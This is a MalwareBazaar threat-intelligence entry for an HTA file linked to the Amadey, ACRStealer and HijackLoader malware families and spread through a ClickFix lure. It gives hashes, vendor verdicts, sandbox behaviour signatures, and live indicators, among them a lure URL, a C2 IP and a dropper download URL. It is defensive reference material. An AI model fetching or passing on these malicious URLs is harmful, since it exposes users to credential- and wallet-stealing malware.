MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Amadey


Vendor detections: 10


Intelligence 10 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0
SHA3-384 hash: b017da3dbbc38e4fd0161d2c9b8954c559611792ae322492cbf724c93bc688afea5407521c10b4dd1a0055bb6f50bb3a
SHA1 hash: 18bffddc274d5cc0e1a04b4e125827eb20e19bd5
MD5 hash: 3038071606faa9813689c156303c9ad2
humanhash: comet-shade-may-happy
File name:nui.gam.hta
Download: download sample
Signature Amadey
Create hunting rule
File size:337 bytes
First seen:2025-10-17 21:17:20 UTC
Last seen:Never
File type:HTML Application (hta) hta
MIME type:text/html
ssdeep 6:qFzLVYrXkEqrnw4+f8MHoUSRXcM2xn9FAwR/4Nhdx434Qb:kqUEqrnw4+FH/SRXsR9T4Nbx4IQb
TLSH T102E07D04ECB5C898157638869FE7FB0C20429157100BD9903F8CEAA28FF2917898E5ED
Magika html
Reporter aachum
Tags:37-27-45-144 827ad8 ACRStealer Amadey ClickFix HIjackLoader hta


Avatar
iamaachum
https://96d23b93.verify-consent-to-continue.pages.dev/ => http://162.252.198.122/nui.gam

ACRStealer C2: 37.27.45.144

Intelligence

File Origin
# of uploads :
1
# of downloads :
259
Origin country :
ES ES
Vendor Threat Intelligence
Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68f2b2750cffb3244299068c
Tags:
shellcode spawn shell
Result
Verdict:
Malicious
File Type:
HTA File - Malicious
Link:
https://app.docguard.net/eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Labled as:
CMD:BZC.UGZ.Boxter.1
Link:
https://www.hybrid-analysis.com/sample/eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0
Verdict:
Malicious
File Type:
html
First seen:
2025-10-17T18:35:00Z UTC
Last seen:
2025-10-17T19:10:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan.Script.Generic
Link:
https://opentip.kaspersky.com/eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0/results?tab=lookup
Result
Threat name:
ACR Stealer, HijackLoader
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1797412
Signature
Allocates memory in foreign processes
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PowerShell case anomaly found
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powershell Download and Execute IEX
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected ACR Stealer
Yara detected HijackLoader
Yara detected Powershell download and execute
Yara detected Python Injector
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1797412 Sample: nui.gam.hta Startdate: 17/10/2025 Architecture: WINDOWS Score: 100 104 wgd.slideshowimprison.digital 2->104 106 mi.limpingbronco.com 2->106 108 7 other IPs or domains 2->108 132 Suricata IDS alerts for network traffic 2->132 134 Found malware configuration 2->134 136 Malicious sample detected (through community Yara rule) 2->136 138 17 other signatures 2->138 13 mshta.exe 2->13         started        16 elevation_service.exe 2->16         started        signatures3 process4 signatures5 168 PowerShell case anomaly found 13->168 18 powershell.exe 15 264 13->18         started        process6 dnsIp7 110 valeforge.space 172.67.221.10, 443, 49690 CLOUDFLARENETUS United States 18->110 140 Suspicious powershell command line found 18->140 142 Found many strings related to Crypto-Wallets (likely being stolen) 18->142 144 Suspicious execution chain found 18->144 146 2 other signatures 18->146 22 Setup.exe 10 18->22         started        26 powershell.exe 17 18->26         started        28 powershell.exe 18 18->28         started        30 conhost.exe 18->30         started        signatures8 process9 file10 84 C:\Users\user\...\MicrosoftEdgeUpdate.exe, PE32 22->84 dropped 86 C:\Users\user\AppData\Local\...\41032F2.tmp, PE32 22->86 dropped 88 C:\ProgramData\9372766\SQLite.Interop.dll, PE32+ 22->88 dropped 90 C:\ProgramData\...\CCleanerReactivator.dll, PE32+ 22->90 dropped 154 Found hidden mapped module (file has been removed from disk) 22->154 156 Switches to a custom stack to bypass stack traces 22->156 158 Found direct / indirect Syscall (likely to bypass EDR) 22->158 32 MicrosoftEdgeUpdate.exe 22->32         started        36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        signatures11 process12 dnsIp13 100 85.209.128.128, 49708, 49709, 80 VELIANET-ASvelianetInternetdiensteGmbHDE Netherlands 32->100 102 37.27.45.144, 443, 49693, 49694 UNINETAZ Iran (ISLAMIC Republic Of) 32->102 124 Found many strings related to Crypto-Wallets (likely being stolen) 32->124 126 Bypasses PowerShell execution policy 32->126 128 Contains functionality to inject code into remote processes 32->128 130 6 other signatures 32->130 40 rundll32.exe 32->40         started        45 powershell.exe 32->45         started        47 powershell.exe 32->47         started        49 9 other processes 32->49 signatures14 process15 dnsIp16 118 wgd.slideshowimprison.digital 104.21.8.191, 443, 49715 CLOUDFLARENETUS United States 40->118 120 mi.limpingbronco.com 172.67.168.12, 49710, 49714, 80 CLOUDFLARENETUS United States 40->120 92 C:\Users\...\eG7gpv3PDKvcrdMkRs3nwTsoc.exe, PE32+ 40->92 dropped 94 C:\Users\...\BUPkZ2RNQywriA5YzbTSiQcl.exe, PE32+ 40->94 dropped 96 C:\Users\...\eG7gpv3PDKvcrdMkRs3nwTsoc[1], PE32+ 40->96 dropped 98 C:\Users\user\...\BUPkZ2RNQywriA5YzbTSiQcl[1], PE32+ 40->98 dropped 160 System process connects to network (likely due to code injection or exploit) 40->160 162 Creates multiple autostart registry keys 40->162 51 BUPkZ2RNQywriA5YzbTSiQcl.exe 40->51         started        164 Powershell uses Background Intelligent Transfer Service (BITS) 45->164 166 Loading BitLocker PowerShell Module 45->166 55 conhost.exe 45->55         started        122 87.120.219.26, 49711, 49712, 80 NET1-ASBG Bulgaria 47->122 57 conhost.exe 47->57         started        59 WerFault.exe 49->59         started        61 WerFault.exe 49->61         started        63 WerFault.exe 49->63         started        65 9 other processes 49->65 file17 signatures18 process19 file20 74 C:\Users\user\AppData\Local\...\_is6EFB.exe, PE32+ 51->74 dropped 148 Multi AV Scanner detection for dropped file 51->148 67 _is6EFB.exe 51->67         started        signatures21 process22 file23 76 C:\Users\user\AppData\...\vcruntime140.dll, PE32 67->76 dropped 78 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 67->78 dropped 80 C:\Users\user\AppData\Local\...\select.pyd, PE32 67->80 dropped 82 13 other malicious files 67->82 dropped 150 Multi AV Scanner detection for dropped file 67->150 152 Found pyInstaller with non standard icon 67->152 71 pythonw.exe 67->71         started        signatures24 process25 dnsIp26 112 91.242.163.152 OOO-SYSMEDIA-ASRU Russian Federation 71->112 114 a8a00b7a27dd309f6.awsglobalaccelerator.com 3.33.196.84 AMAZONEXPANSIONGB United States 71->114 116 2 other IPs or domains 71->116
Verdict:
inconclusive
YARA:
2 match(es)
Tags:
Html
Link:
https://app.malva.re/file/3038071606faa9813689c156303c9ad2
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0/
Verdict:
Malicious
Threat:
Trojan.Script
Link:
https://tip.neiki.dev/file/eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0
Threat name:
Win32.Trojan.Egairtigado
Create hunting rule
Status:
Malicious
First seen:
2025-10-17 21:18:32 UTC
File Type:
Text (HTML)
Extracted files:
1
AV detection:
7 of 24 (29.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=5xn5fj2ggo42jgg3xdesr2v5rfqltvi3n2kf6njgt2tf4o5inlqa._file
Result
Malware family:
hijackloader
Create hunting rule
Score:
  10/10
Tags:
family:hijackloader discovery execution loader spyware stealer
Link:
https://tria.ge/reports/251017-z5axqse12e/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Malware Config
Dropper Extraction:
http://87.120.219.26/CCZT7wMNnD29ie
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Amadey

HTML Application (hta) hta eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0

(this sample)

Amadey

PowerShell (PS) ps1 2caa70d1b1c96ce8b1b4a8f85e4298f2b3f3fdba8ca3b9fa6d60ca561a1296b0

  
Link
https://tria.ge/251017-zy4w8sez8b/behavioral2
  
Delivery method
Distributed via web download
  
Dropping
SHA256 2caa70d1b1c96ce8b1b4a8f85e4298f2b3f3fdba8ca3b9fa6d60ca561a1296b0
  
Dropping
MD5 853ee4c49462dce18cacee59597bfa1e

Comments